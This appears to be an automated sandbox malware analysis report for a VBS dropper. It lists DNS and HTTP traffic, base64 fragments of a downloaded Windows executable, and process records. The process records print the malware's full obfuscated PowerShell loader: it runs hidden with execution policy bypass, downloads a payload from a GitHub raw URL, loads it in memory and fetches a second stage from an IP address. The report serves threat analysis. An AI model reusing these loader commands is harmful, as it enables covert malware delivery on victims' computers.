                        Oct 2, 2024 05:28:25.270235062 CEST4970580192.168.2.7198.46.129.134

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 2, 2024 05:28:21.751262903 CEST5138953192.168.2.71.1.1.1
                        Oct 2, 2024 05:28:21.758261919 CEST53513891.1.1.1192.168.2.7

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Oct 2, 2024 05:28:21.751262903 CEST192.168.2.71.1.1.10xafb5Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Oct 2, 2024 05:28:21.758261919 CEST1.1.1.1192.168.2.70xafb5No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                        Oct 2, 2024 05:28:21.758261919 CEST1.1.1.1192.168.2.70xafb5No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                        Oct 2, 2024 05:28:21.758261919 CEST1.1.1.1192.168.2.70xafb5No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                        Oct 2, 2024 05:28:21.758261919 CEST1.1.1.1192.168.2.70xafb5No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • raw.githubusercontent.com
                        • 198.46.129.134

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.749705198.46.129.134807304C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Oct 2, 2024 05:28:24.599869013 CEST77OUTGET /450/LDBRR.txt HTTP/1.1
                        Host: 198.46.129.134
                        Connection: Keep-Alive
                        Oct 2, 2024 05:28:25.081037998 CEST541INHTTP/1.1 404 Not Found
                        Date: Wed, 02 Oct 2024 03:28:25 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                        Content-Length: 300
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=iso-8859-1
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 34 36 2e 31 32 39 2e 31 33 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 198.46.129.134 Port 80</address></body></html>


                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.749704185.199.108.1334437304C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        2024-10-02 03:28:22 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                        Host: raw.githubusercontent.com
                        Connection: Keep-Alive
                        2024-10-02 03:28:22 UTC903INHTTP/1.1 200 OK
                        Connection: close
                        Content-Length: 2935468
                        Cache-Control: max-age=300
                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                        Content-Type: text/plain; charset=utf-8
                        ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                        Strict-Transport-Security: max-age=31536000
                        X-Content-Type-Options: nosniff
                        X-Frame-Options: deny
                        X-XSS-Protection: 1; mode=block
                        X-GitHub-Request-Id: 9D15:3A4BF6:1706DDC:18C7EAB:66FCBC5F
                        Accept-Ranges: bytes
                        Date: Wed, 02 Oct 2024 03:28:22 GMT
                        Via: 1.1 varnish
                        X-Served-By: cache-ewr-kewr1740069-EWR
                        X-Cache: HIT
                        X-Cache-Hits: 0
                        X-Timer: S1727839702.322234,VS0,VE9
                        Vary: Authorization,Accept-Encoding,Origin
                        Access-Control-Allow-Origin: *
                        Cross-Origin-Resource-Policy: cross-origin
                        X-Fastly-Request-ID: cddefadc67cd839126463674947c571351045038
                        Expires: Wed, 02 Oct 2024 03:33:22 GMT
                        Source-Age: 0
                        2024-10-02 03:28:22 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                        Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                        2024-10-02 03:28:22 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                        Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                        2024-10-02 03:28:22 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                        Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                        2024-10-02 03:28:22 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                        Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                        2024-10-02 03:28:22 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                        Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                        2024-10-02 03:28:22 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                        Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                        2024-10-02 03:28:22 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                        Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                        2024-10-02 03:28:22 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                        Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                        2024-10-02 03:28:22 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                        Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                        2024-10-02 03:28:22 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                        Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:2
                        Start time:23:28:18
                        Start date:01/10/2024
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs"
                        Imagebase:0x7ff7e0f60000
                        File size:170'496 bytes
                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:4
                        Start time:23:28:18
                        Start date:01/10/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                        Imagebase:0x7ff741d30000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:5
                        Start time:23:28:18
                        Start date:01/10/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:6
                        Start time:23:28:20
                        Start date:01/10/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))"
                        Imagebase:0x7ff741d30000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Disassembly

                        Reset < >

                          Executed Functions

                          Function 00007FFAAC5437B5 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1408775544.00007FFAAC540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffaac540000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                          • Instruction ID: 9fb7a4aed85071b837334e697ff3fe6303a71874941b82e708ebe7b936e8a6a5
                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                          • Instruction Fuzzy Hash: EC01677115CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3661DA36E882CB45

                          Non-executed Functions

                          Function 00007FFAAC540FFA Relevance: .2, Instructions: 238COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1408775544.00007FFAAC540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffaac540000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 317a316efb566ff483db4435889b3cdd03b3244564a8e4d9416a785a03797023
                          • Instruction ID: ec523d45fc8cf0106d431ae0da20e8943654749efeece3d6dbe8b556e05a28c2
                          • Opcode Fuzzy Hash: 317a316efb566ff483db4435889b3cdd03b3244564a8e4d9416a785a03797023
